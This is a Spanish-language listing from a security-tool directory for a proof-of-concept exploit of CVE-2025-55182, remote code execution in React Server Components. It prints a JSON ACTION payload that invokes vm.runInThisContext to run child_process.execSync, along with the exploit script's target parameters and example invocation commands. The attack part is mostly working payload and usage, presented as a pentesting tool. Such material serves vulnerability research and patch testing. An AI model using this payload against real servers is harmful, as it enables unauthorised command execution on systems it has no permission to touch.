Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-55182POC — Exploit de prueba de concepto para CVE-2025-55182, que demuestra ejecución remota de código en React Server Components mediante payloads ACTION maliciosos e inyección de vm.runInThisContext. | Kitploit
Herramientas/GitHubGitHub/sudo-yangziran/cve-2025-55182poc
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de Penetración
GitHubsudo-yangziran/cve-2025-55182poc

CVE-2025-55182POC

Exploit de prueba de concepto para CVE-2025-55182, que demuestra ejecución remota de código en React Server Components mediante payloads ACTION maliciosos e inyección de vm.runInThisContext.

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Ver Repositorio
22hace 9 mesesAún no revisado
Compartir

CVE-2025-55182 POC de RCE en React Server Components

Este proyecto es una Prueba de Concepto (PoC) para CVE-2025-55182 - Ejecución Remota de Código (RCE) en React Server Components (RSC), que demuestra cómo, bajo ciertas condiciones, se puede desencadenar ejecución remota de código mediante vm.runInThisContext y cargas útiles (payloads) ACTION maliciosas.

  • Lado Python: envía automáticamente cargas útiles ACTION maliciosas y analiza la respuesta

⚠ Resumen de la vulnerabilidad (CVE-2025-55182)

Las cargas útiles ACTION de React Server Components, bajo ciertas condiciones:

  • Son deserializadas como objetos JS
  • Son ejecutadas mediante vm.runInThisContext
  • Se inyectan automáticamente en las server actions

Un atacante puede construir el siguiente payload:

root@kitploit:~
{
  "$ACTION_REF_0": "",
  "$ACTION_0:0": "{\"id\": \"vm#runInThisContext\", \"bound\": [\"global.process.mainModule.require('child_process').execSync('calc').toString()\"]}"
}
ParámetroRequeridoValor por defectoDescripción
--hostSíNingunoIP o dominio del servidor objetivo. Ej: 127.0.0.1, 192.168.1.10, example.com
--portNo80Puerto del servicio HTTP objetivo. Ej: 3003
--pathSíNingunoRuta del endpoint vulnerable. Ej: /feedback, /action
--httpsNoFalseUsar HTTPS para enviar el payload (por defecto HTTP)

python a.py --host <目标IP> --port <端口> --path <目标URL路径>

python a.py --host 127.0.0.1 --port 3003 --path /feedback

Descargar herramienta